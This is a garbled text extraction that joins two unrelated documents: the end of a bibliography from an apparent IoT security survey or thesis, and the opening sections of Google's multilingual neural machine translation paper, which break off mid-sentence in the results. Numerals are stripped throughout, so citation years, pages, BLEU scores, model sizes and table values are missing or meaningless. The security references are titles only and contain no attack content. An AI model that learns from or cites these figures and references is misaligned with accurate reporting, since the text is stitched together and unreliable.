ieee first international conference on ( ), ieee, pp. – . [ ] fullam, k., and barber, k. learning trust strategies in reputation exchange networks. in aamas ’ : proceedings of the fifth international joint conference on autonomous agents and multiagent systems ( ), acm press, pp. – . [ ] furber, s. b. arm system architecture. addison-wesley longman publishing co., inc., . [ ] garcia, f. d., de koning gans, g., muijrers, r., van rossum, p., verdult, r., schreur, r. w., and jacobs, b. dismantling mifare classic. in european symposium on research in computer security ( ), springer, pp. – . [ ] giusto, d., iera, a., morabito, g., and atzori, l. the internet of things: th tyrrhenian workshop on digital communications. springer science & business media, . [ ] gligorić, n., dejanović, i., and krčo, s. performance evaluation of compact binary xml representation for constrained devices. in distributed computing in sensor systems and workshops (dcoss), international conference on ( ), ieee, pp. – . [ ] glikson, a. fi-ware: core platform for future internet applications. in proceedings of the th annual international conference on systems and storage ( ). [ ] godik, s., anderson, a., parducci, b., humenn, p., and vajjhala, s. oasis extensible access control markup language (xacml) . tech. rep., tech. rep., oasis, . [ ] gomes, b., muniz, l., e silva, f. j. d. s., ríos, l. e. t., and endler, m. a comprehensive cloud-based iot software infrastructure for ambient assisted living. in cloud technologies and applications (cloudtech), international conference on ( ), ieee, pp. – . [ ] goodin, d. new linux worm targets routers, cameras, internet of things devices, . [ ] gudgin, m. e. a. soap version . part : messaging framework. recommendation, w c, june . available at http://www.w .org/tr/ /rec-soap -part - /. [ ] gura, n., patel, a., wander, a., eberle, h., and shantz, s. comparing elliptic curve cryptography and rsa on -bit cpus. in cryptographic hardware and embedded systems - ches , m. joye and j.-j. quisquater, eds., vol. of lecture notes in computer science. springer berlin heidelberg, , pp. – . [ ] hammer-lahav, d., and hardt, d. the oauth . authorization protocol. . tech. rep., ietf internet draft, . / [ ] hanks, p. collins dictionary of the english language. london: collins,— c , nd ed., edited by hanks, patrick ( ). [ ] hardjono, t., smith, n., and pentland, a. s. anonymous identities for permissioned blockchains. [ ] hasan, s., and curry, e. thingsonomy: tackling variety in internet of things events. internet computing, ieee , ( ), – . [ ] hernández, m. e. p., and reiff-marganiec, s. autonomous and self controlling smart ob- jects for the future internet. in future internet of things and cloud (ficloud), rd international conference on ( ), ieee, pp. – . [ ] hernández-ramos, j. l., jara, a. j., marin, l., and skarmeta, a. f. distributed capability-based access control for the internet of things. journal of internet services and information security (jisis) , / ( ), – . [ ] hill, k. when ’smart homes’ get hacked: i haunted a complete stranger’s house via the internet - forbes. http://www.forbes.com/sites/kashmirhill/ / / / smart-homes-hack/, . (visited on / / ). [ ] iivari, a., väisänen, t., ben alaya, m., riipinen, t., and monteil, t. harnessing xmpp for machine-to-machine communications & pervasive applications. journal of communications software & systems , ( ). [ ] initiative, k., et al. user managed access (uma), . [ ] ji, z., ganchev, i., o’droma, m., zhao, l., and zhang, x. a cloud-based car parking middleware for iot-based smart cities: design and implementation. sensors , ( ), – . [ ] jØsang, a., ismail, r., and boyd, c. a survey of trust and reputation systems for online service provision. decision support systems , (march ), – . [ ] keoh, s., kumar, s., and garcia-morchon, o. securing the ip-based internet of things with dtls. working draft, february ( ). [ ] khurana, h., hadley, m., lu, n., and frincke, d. a. smart-grid security issues. security & privacy, ieee , ( ), – . [ ] kliem, a. cooperative device cloud. [ ] koblitz, n. elliptic curve cryptosystems. mathematics of computation , ( ), – . [ ] koschuch, m., hudler, m., and krüger, m. performance evaluation of the tls handshake in the context of embedded devices. in data communication networking (dcnet), proceedings of the international conference on ( ), ieee, pp. – . [ ] lan, l., wang, b., zhang, l., shi, r., and li, f. an event-driven service-oriented architecture for internet of things service execution. international journal of online engineering (ijoe) , ( ), pp– . [ ] landman, d. davylandman/aeslib. https://github.com/davylandman/aeslib, . (visited on / / ). [ ] larson, j., perlroth, n., and shane, s. the nsa’s secret campaign to crack, un- dermine internet encryption - propublica. http://www.propublica.org/article/ the-nsas-secret-campaign-to-crack-undermine-internet-encryption, . (visited on / / ). [ ] le vinh, t., bouzefrane, s., farinone, j.-m., attar, a., and kennedy, b. p. middleware to integrate mobile devices, sensors and cloud computing. procedia computer science ( ), – . [ ] levä, t., mazhelis, o., and suomi, h. comparing the cost-efficiency of coap and http in web of things applications. decision support systems ( ), – . / [ ] levendovszky, t., dubey, a., otte, w. r., balasubramanian, d., coglio, a., nyako, s., emfinger, w., kumar, p., gokhale, a., and karsai, g. distributed real-time managed systems: a model-driven distributed secure information architecture platform for managed embedded systems. software, ieee , ( ), – . [ ] levinson, l. secrets, lies and snowden’s email: why i was forced to shut down lavabit. http://www.theguardian.com/commentisfree/ /may/ / why-did-lavabit-shut-down-snowden-email, . (visited on / / ). [ ] lim, l., marie, p., conan, d., chabridon, s., desprats, t., and manzoor, a. enhancing context data distribution for the internet of things using qoc-awareness and attribute-based access control. annals of telecommunications , - ( ), – . [ ] linksmart. eulinksmartsecuritycommunicationsecuritymanagersym - links- mart open source middleware - linksmart middleware portal. https:// linksmart.eu/redmine/projects/linksmart-opensource/wiki/ eulinksmartsecuritycommunicationsecuritymanagersym, . (visited on / / ). [ ] linksmart.eu. linksmart middleware portal. https://linksmart.eu/redmine, . (visited on / / ). [ ] liu, c. h., yang, b., and liu, t. efficient naming, addressing and profile services in internet- of-things sensory environments. ad hoc networks ( ), – . [ ] locke, d. mq telemetry transport (mqtt) v . protocol specification. ibm developerworks technical library], available at http://www. ibm. com/developerworks/webservices/library/ws- mqtt/index. html ( ). [ ] lomne, v., dehaboui, a., maurine, p., torres, l., and robert, m. side channel attacks. in security trends for fpgas. springer, , pp. – . [ ] luckenbach, t., gober, p., arbanowski, s., kotsopoulos, a., and kim, k. tinyrest-a protocol for integrating sensor networks into the internet. in proc. of realwsn ( ), pp. – . [ ] mahalle, p. n., anggorojati, b., prasad, n. r., and prasad, r. identity establishment and capability based access control (iecac) scheme for internet of things. in wireless personal multimedia communications (wpmc), th international symposium on ( ), ieee, pp. – . [ ] mcdaniel, p., and mclaughlin, s. security and privacy challenges in the smart grid. security & privacy, ieee , ( ), – . [ ] mhlaba, a., and masinde, m. implementation of middleware for internet of things in asset tracking applications: in-lining approach. in industrial informatics (indin), ieee th international conference on ( ), ieee, pp. – . [ ] michiardi, p., and molva, r. core: a collaborative reputation mechanism to enforce node cooperation in mobile ad hoc networks. in advanced communications and multimedia security. springer, , pp. – . [ ] miller, v. s. use of elliptic curves in cryptography. in advances in cryptology—crypto’ proceedings ( ), springer, pp. – . [ ] montanari, r., toninelli, a., and bradshaw, j. m. context-based security management for multi-agent systems. in multi-agent security and survivability, ieee nd symposium on ( ), ieee, pp. – . [ ] morris, t. trusted platform module., . [ ] moskowitz, r. hip diet exchange (dex). [ ] moskowitz, r. host identity protocol architecture. [ ] mpitziopoulos, a., gavalas, d., konstantopoulos, c., and pantziou, g. a survey on jamming attacks and countermeasures in wsns. ieee communications surveys & tutorials , ( ). / [ ] murphy, c. internet of things: who gets the data? - informationweek. http://www.informationweek.com/ strategic-cio/executive-insights-and-innovation/ internet-of-things-who-gets-the-data/a/d-id/ , . (visited on / / ). [ ] nakamoto, s. bitcoin: a peer-to-peer electronic cash system. [ ] narayanan, a., and shmatikov, v. robust de-anonymization of large sparse datasets. in security and privacy, . sp . ieee symposium on ( ), ieee, pp. – . [ ] naumenko, a., katasonov, a., and terziyan, v. a security framework for smart ubiquitous industrial resources. in enterprise interoperability ii. springer, , pp. – . [ ] nest, g. how to keep your nest products and the nest app up to date. https://nest.com/support/article/ how-to-keep-your-nest-products-and-the-nest-app-up-to-date, . (accessed on / / ). [ ] newsome, j., shi, e., song, d., and perrig, a. the sybil attack in sensor networks: analysis & defenses. in proceedings of the rd international symposium on information processing in sensor networks ( ), acm, pp. – . [ ] nicholas, s. power profiling: https long polling vs. mqtt with ssl on android ( ), . [ ] o. garcia-morchon, e. a. security considerations in the ip-based internet of things. internet draft, ietf, september . available at http://tools.ietf.org/html/ draft-garcia-core-security- . [ ] o’hearn, z. w. names: distributed, secure, human-readable: choose two. https://web. archive.org/web/ /http://zooko.com/distnames.html, . (accessed on / / ). [ ] park, k.-w., seok, h., and park, k.-h. pkasso: towards seamless authentication providing non-repudiation on resource-constrained devices. in advanced information networking and ap- plications workshops, , ainaw’ . st international conference on ( ), vol. , ieee, pp. – . [ ] park, n., and kang, n. mutual authentication scheme in secure internet of things technology for comfortable lifestyle. sensors , ( ), . [ ] patti, e., acquaviva, a., jahn, m., pramudianto, f., tomasi, r., rabourdin, d., virgone, j., and macii, e. event-driven user-centric middleware for energy-efficient buildings and public spaces. ieee systems journal , ( ), – . [ ] paverd, a., and martin, a. hardware security for device authentication in the smart grid. in first open eit ict labs workshop on smart grid security - smartgridsec (berlin, germany, ). [ ] perelman, v., and ersue, m. tls with psk for constrained devices. [ ] perera, c., jayaraman, p. p., zaslavsky, a., georgakopoulos, d., and christen, p. mosden: an internet of things middleware for resource constrained mobile devices. in system sciences (hicss), th hawaii international conference on ( ), ieee, pp. – . [ ] perera, c., and vasilakos, a. v. a knowledge-based resource discovery for internet of things. knowledge-based systems ( ), – . [ ] perrig, a., szewczyk, r., tygar, j., wen, v., and culler, d. e. spins: security protocols for sensor networks. wireless networks , ( ), – . [ ] pfleeger, c. p., and pfleeger, s. l. security in computing. prentice hall professional technical reference, . [ ] pham, l. m., el-rheddane, a., donsez, d., and de palma, n. cirus: an elastic cloud- based framework for ubilytics. annals of telecommunications , - ( ), – . / [ ] point, c. cpai- - misfortune cookie. https://www.checkpoint.com/ defense/advisories/public/ /cpai- - .html, . (accessed on / / ). [ ] radomirovic, s. towards a model for security and privacy in the internet of things. in proc. first int’l workshop on security of the internet of things ( ). [ ] ramachandran, g. s., daniels, w., proença, j., michiels, s., joosen, w., hughes, d., and porter, b. hitch hiker: a remote binding model with priority based data aggregation for wireless sensor networks. in proceedings of the th international acm sigsoft symposium on component-based software engineering ( ), acm, pp. – . [ ] razzaque, m. a., milojevic-jevric, m., palade, a., and clarke, s. middleware for internet of things: a survey. ieee internet of things journal , ( ), – . [ ] rendle, a. who owns the data in the internet of things? http://www.taylorwessing. com/download/article\_data\_lot.html, . (visited on / / ). [ ] renner, t., kliem, a., and kao, o. the device cloud-applying cloud computing concepts to the internet of things. in ubiquitous intelligence and computing, ieee th intl conf on and ieee th intl conf on and autonomic and trusted computing, and ieee th intl conf on scalable computing and communications and its associated workshops (utc-atc-scalcom) ( ), ieee, pp. – . [ ] rescorla, e., and modadugu, n. datagram transport layer security. tech. rep., . [ ] rivest, r. l., shamir, a., and adleman, l. a method for obtaining digital signatures and public-key cryptosystems. communications of the acm , ( ), – . [ ] rotondi, d., seccia, c., and piccione, s. access control & iot: capability based authorization access control system. in st iot international forum, berlin, november ( ). [ ] ryan, m. bluetooth: with low energy comes low security. in woot ( ). [ ] sadeghi, a.-r., and stüble, c. property-based attestation for computing platforms: caring about properties, not mechanisms. in proceedings of the workshop on new security paradigms ( ), acm, pp. – . [ ] saint-andre, p. extensible messaging and presence protocol (xmpp): core. [ ] sakimura, n., bradley, j., and jones, m. [ ] sakimura, n., bradley, j., and jones, m. openid connect dynamic client registration . -draft , . [ ] samsung. mobile enterprise security — samsung knox. https://www.samsungknox. com/en, . (visited on / / ). [ ] schneier, b. tracking vehicles through tire pressure monitors. https://www.schneier. com/blog/archives/ / /tracking_vehicl.html, . (accessed on / / ). [ ] schneier, b. iphone encryption and the return of the crypto wars. schneier on security ( ), . [ ] scuturici, v.-m., surdu, s., gripay, y., and petit, j.-m. ubiware: web-based dynamic data & service management platform for ami. in proceedings of the posters and demo track ( ), acm, p. . [ ] seiger, r., huber, s., and schlegel, t. toward an execution system for self-healing workflows in cyber-physical systems. software & systems modeling ( ), – . [ ] seshadri, a., perrig, a., van doorn, l., and khosla, p. swatt: software-based attestation for embedded devices. in security and privacy, . proceedings. ieee symposium on ( ), ieee, pp. – . [ ] sethi, m. security in smart object networks. master’s thesis, aalto university, school of science, . / [ ] sethi, m., arkko, j., and keranen, a. end-to-end security for sleepy smart object networks. in local computer networks workshops (lcn workshops), ieee th conference on ( ), ieee, pp. – . [ ] shor, p. w. polynomial-time algorithms for prime factorization and discrete logarithms on a quantum computer. siam review , ( ), – . [ ] sicari, s., rizzardi, a., miorandi, d., cappiello, c., and coen-porisini, a. a secure and quality-aware prototypical architecture for the internet of things. information systems ( ), – . [ ] sicari, s., rizzardi, a., miorandi, d., cappiello, c., and coen-porisini, a. security policy enforcement for networked smart objects. computer networks ( ), – . [ ] silaghi, g. c., arenas, a., and silva, l. m. reputation-based trust management systems and their applicability to grids. tech. rep. tr- , institutes on knowledge and data management and system architecture, coregrid - network of excellence, february . [ ] simmonds, a., sandilands, p., and van ekert, l. an ontology for network security attacks. in applied computing. springer, , pp. – . [ ] skorobogatov, s. the bumpy road towards iphone c nand mirroring. arxiv preprint arxiv: . ( ). [ ] skorobogatov, s. p. semi-invasive attacks: a new approach to hardware security analysis. phd thesis, citeseer, . [ ] soursos, s., žarko, i. p., zwickl, p., gojmerac, i., bianchi, g., and carrozzo, g. towards the cross-domain interoperability of iot platforms. in networks and communications (eucnc), european conference on ( ), ieee, pp. – . [ ] spiekermann, s., and cranor, l. f. engineering privacy. ieee transactions on software engineering , ( ), – . [ ] steil, m. mistakes microsoft made in the xbox security system. in nd chaos communication congr. ( ). [ ] svensson fors, d., magnusson, b., gestegård robertz, s., hedin, g., and nilsson- nyman, e. ad-hoc composition of pervasive services in the palcom architecture. in proceedings of the international conference on pervasive services ( ), acm, pp. – . [ ] tajmajer, t., lalis, s., koutsoubelias, m., pruszkowski, a., domaszewicz, j., nati, m., and gluhak, a. node/proxy portability: designing for the two lives of your next wsan middleware. journal of systems and software ( ), – . [ ] talavera, l. e., endler, m., vasconcelos, i., vasconcelos, r., cunha, m., and e silva, f. j. d. s. the mobile hub concept: enabling applications for the internet of mobile things. in pervasive computing and communication workshops (percom workshops), ieee international conference on ( ), ieee, pp. – . [ ] tcg. trusted computing group - home. http://www.trustedcomputinggroup.org/, . (visited on / / ). [ ] terziyan, v., kaykova, o., and zhovtobryukh, d. ubiroad: semantic middleware for context-aware smart road environments. in internet and web applications and services (iciw), fifth international conference on ( ), ieee, pp. – . [ ] tindall, k. how bitcoin might fix the broken internet of things. https://freo.me/ jnzrbm, . (accessed on / / ). [ ] tschofenig, h., and fossati, t. a tls/dtls . profile for the internet of things. draft-ietf-dice- profile- (work in progress) ( ). [ ] tschofenig, h., maler, e., wahlstroem, e., and erdtman, s. authentication and authorization for constrained environments using oauth and uma. https://tools.ietf.org/ html/draft-maler-ace-oauth-uma- , . (accessed on / / ). [ ] turkmen, f., and crispo, b. performance evaluation of xacml pdp implementations. in proceedings of the acm workshop on secure web services ( ), acm, pp. – . / [ ] tziritas, n., georgakoudis, g., lalis, s., paczesny, t., domaszewicz, j., lampsas, p., and loukopoulos, t. middleware mechanisms for agent mobility in wireless sensor and actuator networks. in international conference on sensor systems and software ( ), springer, pp. – . [ ] ungurean, i., gaitan, n. c., and gaitan, v. g. a middleware based architecture for the industrial internet of things. ksii transactions on internet and information systems (tiis) , ( ), – . [ ] union, e. reform of eu data protection rules - european commission. http://ec.europa. eu/justice/data-protection/reform/index_en.htm, . [ ] university of portsmouth library. discovery service. http://www.port.ac.uk/ library/infores/discovery/filetodownload, ,en.xls, . (visited on / / ). [ ] vasconcelos, r. o., talavera, l., vasconcelos, i., roriz, m., endler, m., gomes, b. d. t. p., and e silva, f. j. d. s. an adaptive middleware for opportunistic mobile sensing. in distributed computing in sensor systems (dcoss), international conference on ( ), ieee, pp. – . [ ] vázquez, a. g., soria-rodriguez, p., bisson, p., gidoin, d., trabelsi, s., and serme, g. fi-ware security: future internet security core. in european conference on a service-based internet ( ), springer, pp. – . [ ] vieira, m. a. m., coelho jr, c. n., da silva jr, d. c., and da mata, j. m. survey on wireless sensor network devices. in emerging technologies and factory automation, . proceedings. etfa’ . ieee conference ( ), vol. , ieee, pp. – . [ ] vincent, j. london’s bins are tracking your smartphone. http:// www.independent.co.uk/life-style/gadgets-and-tech/news/ updated-londons-bins-are-tracking-your-smartphone- .html, . (accessed on / / ). [ ] watro, r., kong, d., cuti, s.-f., gardiner, c., lynn, c., and kruus, p. tinypk: securing sensor networks with public key technology. in proceedings of the nd acm workshop on security of ad hoc and sensor networks ( ), acm, pp. – . [ ] wei, j. ddos on internet of things–a big alarm for the future. [ ] winter, j. s. privacy and the emerging internet of things: using the framework of contextual integrity to inform policy. in pacific telecommunication council conference proceedings ( ). [ ] xu, x., li, m., and liang, j. a middleware for environmental monitoring and control. in services computing (scc), ieee international conference on ( ), ieee, pp. – . [ ] yan, s. y. side-channel attacks. in cryptanalytic attacks on rsa. springer, , pp. – . [ ] yi, s., and kravets, r. key management for heterogeneous ad hoc wireless networks. in network protocols, . proceedings. th ieee international conference on ( ), ieee, pp. – . [ ] yun, j., ahn, i.-y., sung, n.-m., and kim, j. a device software platform for consumer electronics based on the internet of things. ieee transactions on consumer electronics , ( ), – . [ ] zee. fitbit users are unwittingly sharing details of their sex lives with the world, . (visited on / / ). [ ] zhiliang, w., yi, y., lu, w., and wei, w. a soa based iot communication middleware. in mechatronic science, electric engineering and computer (mec), international conference on ( ), ieee, pp. – . [ ] zouridaki, c., mark, b. l., hejmo, m., and thomas, r. k. hermes: a quantitative trust establishment framework for reliable data packet delivery in manets. journal of computer security , ( ), – . / [ ] zouridaki, c., mark, b. l., hejmo, m., and thomas, r. k. e-hermes: a robust cooperative trust establishment scheme for mobile ad hoc networks. ad hoc networks , ( ), – . / google’s multilingual neural machine translation system: enabling zero-shot translation melvin johnson∗, mike schuster∗, quoc v. le, maxim krikun, yonghui wu, zhifeng chen, nikhil thorat, fernanda viégas, martin wattenberg, greg corrado, macduff hughes, jeffrey dean google {melvinp,schuster}@google.com abstract we propose a simple solution to use a single neural machine translation (nmt) model to translate between multiple languages. our solu- tion requires no changes to the model architec- ture from a standard nmt system but instead introduces an artificial token at the beginning of the input sentence to specify the required target language. using a shared wordpiece vo- cabulary, our approach enables multilingual nmt systems using a single model. on the wmt’ benchmarks, a single multilingual model achieves comparable performance for english→french and surpasses state-of-the- art results for english→german. similarly, a single multilingual model surpasses state- of-the-art results for french→english and german→english on wmt’ and wmt’ benchmarks, respectively. on production cor- pora, multilingual models of up to twelve language pairs allow for better translation of many individual pairs. our models can also learn to perform implicit bridging between lan- guage pairs never seen explicitly during train- ing, showing that transfer learning and zero- shot translation is possible for neural transla- tion. finally, we show analyses that hints at a universal interlingua representation in our mod- els and also show some interesting examples when mixing languages. introduction end-to-end neural machine translation (nmt) (sutskever et al., ; bahdanau et al., ; cho et al., ) is an approach to machine ∗corresponding authors. translation that has rapidly gained adoption in many large-scale settings (zhou et al., ; wu et al., ; crego and et al., ). almost all such systems are built for a single language pair — so far there has not been a sufficiently simple and efficient way to handle multiple language pairs using a single model without making significant changes to the basic nmt architecture. in this paper we introduce a simple method to translate between multiple languages using a single model, taking advantage of multilingual data to im- prove nmt for all languages involved. our method requires no change to the traditional nmt model architecture. instead, we add an artificial token to the input sequence to indicate the required target lan- guage, a simple amendment to the data only. all other parts of the system — encoder, decoder, atten- tion, and shared wordpiece vocabulary as described in wu et al., ( ) — stay exactly the same. this method has several attractive benefits: • simplicity: since no changes are made to the architecture of the model, scaling to more lan- guages is trivial — any new data is simply added, possibly with over- or under-sampling such that all languages are appropriately rep- resented, and used with a new token if the tar- get language changes. since no changes are made to the training procedure, the mini-batches for training are just sampled from the overall mixed-language training data just like for the single-language case. since no a-priori deci- sions about how to allocate parameters for dif- ferent languages are made, the system adapts automatically to use the total number of param- transactions of the association for computational linguistics, vol. , pp. – , . action editor: colin cherry. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. eters efficiently to minimize the global loss. a multilingual model architecture of this type also simplifies production deployment significantly since it can cut down the total number of mod- els necessary when dealing with multiple lan- guages. note that at google, we support a total of over languages as source and target, so theoretically models would be necessary for the best possible translations between all pairs, if each model could only support a single language pair. clearly this would be problem- atic in a production environment. even when limiting to translating to/from english only, we still need over models. finally, batching to- gether many requests from potentially different source and target languages can significantly improve efficiency of the serving system. in comparison, an alternative system that requires language-dependent encoders, decoders or at- tention modules does not have any of the above advantages. • low-resource language improvements: in a multilingual nmt model, all parameters are implicitly shared by all the language pairs being modeled. this forces the model to generalize across language boundaries during training. it is observed that when language pairs with little available data and language pairs with abundant data are mixed into a single model, translation quality on the low resource language pair is significantly improved. • zero-shot translation: a surprising benefit of modeling several language pairs in a single model is that the model can learn to translate between language pairs it has never seen in this combination during training (zero-shot transla- tion) — a working example of transfer learn- ing within neural translation models. for ex- ample, a multilingual nmt model trained with portuguese→english and english→spanish ex- amples can generate reasonable translations for portuguese→spanish although it has not seen any data for that language pair. we show that the quality of zero-shot language pairs can easily be improved with little additional data of the lan- guage pair in question (a fact that has been pre- viously confirmed for a related approach which is discussed in more detail in the next section). in the remaining sections of this paper we first discuss related work and explain our multilingual system architecture in more detail. then, we go through the different ways of merging languages on the source and target side in increasing diffi- culty (many-to-one, one-to-many, many-to-many), and discuss the results of a number of experiments on wmt benchmarks, as well as on some of google’s large-scale production datasets. we present results from transfer learning experiments and show how implicitly-learned bridging (zero-shot translation) performs in comparison to explicit bridging (i.e., first translating to a common language like english and then translating from that common language into the desired target language) as typically used in machine translation systems. we describe visualizations of the new system in action, which provide early evidence of shared semantic representations (interlingua) be- tween languages. finally we also show some interest- ing applications of mixing languages with examples: code-switching on the source side and weighted tar- get language mixing, and suggest possible avenues for further exploration. related work interlingual translation is a classic method in machine translation (richens, ; hutchins and somers, ). despite its distinguished history, most practi- cal applications of machine translation have focused on individual language pairs because it was simply too difficult to build a single system that translates reliably from and to several languages. neural machine translation (nmt) (kalchbren- ner and blunsom, ) was shown to be a promis- ing end-to-end learning approach in sutskever et al. ( ); bahdanau et al. ( ); cho et al. ( ) and was quickly extended to multilingual machine translation in various ways. an early attempt is the work in dong et al., ( ), where the authors modify an attention-based encoder- decoder approach to perform multilingual nmt by adding a separate decoder and attention mechanism for each target language. in luong et al., ( a) multilingual training in a multitask learning setting is described. this model is also an encoder-decoder network, in this case without an attention mechanism. to make proper use of multilingual data, they extend their model with multiple encoders and decoders, one for each supported source and target language. in caglayan et al., ( ) the authors incorporate multiple modalities other than text into the encoder- decoder framework. several other approaches have been proposed for multilingual training, especially for low-resource lan- guage pairs. for instance, in zoph and knight ( ) a form of multi-source translation was proposed where the model has multiple different encoders and different attention mechanisms for each source lan- guage. however, this work requires the presence of a multi-way parallel corpus between all the languages involved, which is difficult to obtain in practice. most closely related to our approach is firat et al., ( a) in which the authors propose multi-way multilingual nmt using a single shared attention mechanism but multiple encoders/decoders for each source/target language. recently in lee et al., ( ) a cnn- based character-level encoder was proposed which is shared across multiple source languages. however, this approach can only perform translations into a single target language. our approach is related to the multitask learning framework (caruana, ). despite its promise, this framework has seen limited practical success in real world applications. in speech recognition, there have been many successful reports of modeling multiple languages using a single model ( (schultz and kirch- hoff, ) for an extensive reference and references therein). multilingual language processing has also shown to be successful in domains other than transla- tion (gillick et al., ; tsvetkov et al., ). there have been other approaches similar to ours in spirit, but used for very different purposes. in sen- nrich et al.,( a), the nmt framework has been extended to control the politeness level of the target translation by adding a special token to the source sentence. the same idea was used in yamagishi et al., ( ) to add the distinction between ‘active’ and ‘passive’ tense to the generated target sentence. our method has an additional benefit not seen in other systems: it gives the system the ability to per- form zero-shot translation, meaning the system can translate from a source language to a target language without having seen explicit examples from this spe- cific language pair during training. zero-shot trans- lation was the direct goal of firat et al., ( c). although they were not able to achieve this direct goal, they were able to do what they call “zero- resource” translation by using their pre-trained multi- way multilingual model and later fine-tuning it with pseudo-parallel data generated by the model. it should be noted that the difference between “zero- shot” and “zero-resource” translation is the additional fine-tuning step which is required in the latter ap- proach. to the best of our knowledge, our work is the first to validate the use of true multilingual translation using a single encoder-decoder model, and is inci- dentally also already used in a production setting. it is also the first work to demonstrate the possibil- ity of zero-shot translation, a successful example of transfer learning in machine translation, without any additional steps. system architecture the multilingual model architecture is identical to google’s neural machine translation (gnmt) sys- tem (wu et al., ) (with the optional addition of direct connections between encoder and decoder lay- ers which we have used for some of our experiments). to be able to make use of multilingual data within a single system, we propose one simple modification to the input data, which is to introduce an artificial token at the beginning of the input sentence to indi- cate the target language the model should translate to. for instance, consider the following en→es pair of sentences: how are you? -> ¿cómo estás? it will be modified to: < es> how are you? -> ¿cómo estás? to indicate that spanish is the target language. note that we don’t specify the source language – the model will learn this automatically. after adding the token to the input data, we train the model with all multilingual data consisting of multiple language pairs at once, possibly after over- or undersampling some of the data to adjust for the relative ratio of the language data available. to ad- dress the issue of translation of unknown words and to limit the vocabulary for computational efficiency, we use a shared wordpiece model (schuster and nakajima, ) across all the source and target data used for training, usually with , word pieces. the segmentation algorithm used here is very similar (with small differences) to byte-pair-encoding (bpe) which was described in gage ( ) and was also used in sennrich et al., ( b) for machine transla- tion. all training is carried out similar to (wu et al., ) and implemented in tensorflow (abadi and et al., ). in summary, this approach is the simplest among the alternatives that we are aware of. during training and inference, we only need to add one additional token to each sentence of the source data to specify the desired target language. experiments and results in this section, we apply our proposed method to train multilingual models in several different configu- rations. since we can have models with either single or multiple source/target languages we test three in- teresting cases for mapping languages: ) many to one, ) one to many, and ) many to many. as al- ready discussed in section , other models have been used to explore some of these cases already, but for completeness we apply our technique to these inter- esting use cases again to give a full picture of the effectiveness of our approach. we will also show results and discuss benefits of bringing together many (un)related languages in a single large-scale model trained on production data. finally, we will present our findings on zero-shot translation where the model learns to translate be- tween pairs of languages for which no explicit par- allel examples existed in the training data, and show results of experiments where adding additional data improves zero-shot translation quality further. . datasets, training protocols and evaluation metrics for wmt, we train our models on the wmt’ en→fr and the wmt’ en→de datasets. in both cases, we use newstest as the test sets to be able to compare against previous work (luong et al., c; sébastien et al., ; zhou et al., ; wu et al., ). for wmt fr→en and de→en we use newstest and newstest as test sets. de- spite training on wmt’ data, which is somewhat smaller than wmt’ , we test our de→en model on newstest , similar to luong et al., ( b). the combination of newstest and newstest is used as the development set. in addition to wmt, we also evaluate the multilin- gual approach on some google-internal large-scale production datasets representing a wide spectrum of languages with very distinct linguistic properties: en↔japanese(ja), en↔korean(ko), en↔es, and en↔pt. these datasets are two to three orders of magnitude larger than the wmt datasets. our training protocols are mostly identical to those described in wu et al., ( ). we find that some multilingual models take a little more time to train than single language pair models, likely because each language pair is seen only for a fraction of the train- ing process. we use larger batch sizes with a slightly higher initial learning rate to speed up the conver- gence of these models. we evaluate our models using the standard bleu score metric and to make our results comparable to previous work (sutskever et al., ; luong et al., c; zhou et al., ; wu et al., ), we report tokenized bleu score as computed by the multi-bleu.pl script, which can be downloaded from the public implementation of moses. to test the influence of varying amounts of train- ing data per language pair we explore two strategies when building multilingual models: a) where we oversample the data from all language pairs to be of the same size as the largest language pair, and b) where we mix the data as is without any change. the wordpiece model training is done after the optional oversampling taking into account all the changed data ratios. for the wmt models we report results using both of these strategies. for the production models, we always balance the data such that the ratios are equal. one benefit of the way we share all the components of the model is that the mini-batches can contain data from different language pairs during training and in- ference, which are typically just random samples from the final training and test data distributions. this is a simple way of preventing “catastrophic forgetting” - tendency for knowledge of previously http://www.statmt.org/moses/ learned task(s) (e.g. language pair a) to be abruptly forgotten as information relevant to the current task (e.g. language pair b) is incorporated (french, ). other approaches to multilingual translation require complex update scheduling mechanisms to prevent this effect (firat et al., b). . many to one in this section we explore having multiple source lan- guages and a single target language — the simplest way of combining language pairs. since there is only a single target language no additional source token is required. we perform three sets of experiments: • the first set of experiments is on the wmt datasets, where de→en and fr→en are com- bined to train a multilingual model. our base- lines are two single language pair models: de→en and fr→en trained independently. we perform these experiments once with oversam- pling and once without. • the second set of experiments is on production data where we combine ja→en and ko→en, with oversampling. the baselines are two single language pair models trained independently. • finally, the third set of experiments is on pro- duction data where we combine es→en and pt→en, with oversampling. the baselines are again two single language pair models trained independently. all of the multilingual and single language pair mod- els have the same total number of parameters as the baseline nmt models trained on a single language pair (using nodes, lstm layers and a shared wordpiece model vocabulary of k, a total of m parameters per model). a side effect of this equal choice of parameters is that it is presumably unfair to the multilingual models as the number of parameters available per language pair is reduced by a factor of n compared to the single language pair models, if n is the number of language pairs combined in the multilingual model. the multilingual model also has to handle the combined vocabulary of all the single models. we chose to keep the number of parameters constant for all models to simplify experimentation. we relax this constraint for some of the large-scale experiments shown further below. table : many to one: bleu scores on for single lan- guage pair and multilingual models. ?: no oversampling model single multi diff wmt de→en . . + . wmt fr→en . . + . wmt de→en? . . + . wmt fr→en? . . + . prod ja→en . . + . prod ko→en . . + . prod es→en . . + . prod pt→en . . + . the results are presented in table . for all ex- periments the multilingual models outperform the baseline single systems despite the above mentioned disadvantage with respect to the number of param- eters available per language pair. one possible hy- pothesis explaining the gains is that the model has been shown more english data on the target side, and that the source languages belong to the same language families, so the model has learned useful generalizations. for the wmt experiments, we obtain a maximum gain of + . bleu for fr→en. note that the re- sults on both the wmt test sets are better than other published state-of-the-art results for a single model, to the best of our knowledge. . one to many in this section, we explore the application of our method when there is a single source language and multiple target languages. here we need to prepend the input with an additional token to specify the target language. we perform three sets of experiments very similar to the previous section. table summarizes the results when performing translations into multiple target languages. we see that the multilingual models are comparable to, and in some cases outperform, the baselines, but not al- ways. we obtain a large gain of + . bleu for en→es. unlike the previous set of results, there are less significant gains in this setting. this is perhaps due to the fact that the decoder has a more difficult time translating into multiple target languages which may even have different scripts, which are combined into a single shared wordpiece vocabulary. note that even for languages with entirely different scripts (e.g., korean and japanese) there is significant overlap in wordpieces when real data is used, as often numbers, dates, names, websites, punctuation etc. are actually using a shared script (ascii). table : one to many: bleu scores for single language pair and multilingual models. ?: no oversampling model single multi diff wmt en→de . . + . wmt en→fr . . - . wmt en→de? . . - . wmt en→fr? . . - . prod en→ja . . + . prod en→ko . . - . prod en→es . . + . prod en→pt . . + . we 